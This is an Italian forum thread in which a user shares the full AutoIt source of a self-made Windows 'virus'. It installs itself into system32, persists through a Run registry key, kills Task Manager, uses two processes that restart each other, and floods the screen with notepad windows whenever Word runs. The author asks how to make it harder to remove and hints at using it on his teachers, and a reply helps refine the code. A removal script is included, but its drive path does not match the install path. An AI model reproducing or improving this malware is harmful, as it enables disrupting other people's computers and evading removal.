Virus - Se apri Word....

Ho creato questa specie di virus tanto per esercitarmi un po' in autoit, non sono un lamer e non lo userò mai contro qualcuno (eccetto le mie prof )
Il virus è composto da 3 files, uniti insieme con iexpress:

START.exe

Codice:

#NoTrayIcon
FileCopy("virus.exe", "C:\WINDOWS\system32\")
FileCopy("antitask.exe", "C:\WINDOWS\system32\")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "AutoAvvio", "REG_SZ", "C:\WINDOWS\system32\virus.exe")
Run("C:\WINDOWS\system32\virus.exe")

virus.exe

Codice:

#NoTrayIcon
If ProcessExists("antitask.exe") Then
   Sleep("100")
Else
   Run("C:\WINDOWS\system32\antitask.exe")
EndIf
While 1 = 1
   If ProcessExists("word.exe") Then
      
                While 1 = 1
                Run("notepad.exe")
                WEnd

   ElseIf ProcessExists("antitask.exe") Then
      Sleep("100")

   Else
      Run("C:\WINDOWS\system32\antitask.exe")
      EndIf
   EndIf
WEnd

antitask.exe

Codice:

#NoTrayIcon
while 1 = 1
   ProcessClose("taskmgr.exe")
   If ProcessExists("virus.exe") Then
      Sleep("100")
   Else
      Run("C:\WINDOWS\system32\virus.exe")
   EndIf
WEnd

Nonostante non sia possibile utilizzare il taskmanager, alcuni firewall permettono di chiudere i processi, ecco quindi che si rigenerano a vicenda.
E poi, basta eliminare la chiave di registro e riavviare il pc per disabilitarlo.
Se avete altre idee per renderlo meno estirpabile (infatti se col firewall mettiamo i processi in quarantena si riesca ad estirparlo) lo dica pure

P.S.
Ecco il file di antidoto:

Codice:

ProcessClose("antitask.exe")
ProcessClose("virus.exe")
FileDelete("D:\WINDOWS\system32\virus.exe")
FileDelete("D:\WINDOWS\system32\antitask.exe")
RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "AutoAvvio")

perchè metti sleep("100")? (che tra l'altro dovrebbe essere sleep(100))
fai prima a scrivere:

Codice:

If Not ProcessExists("taskmgr.exe")

ah grazie, non la conoscevo questa funzione...
mo aggiusto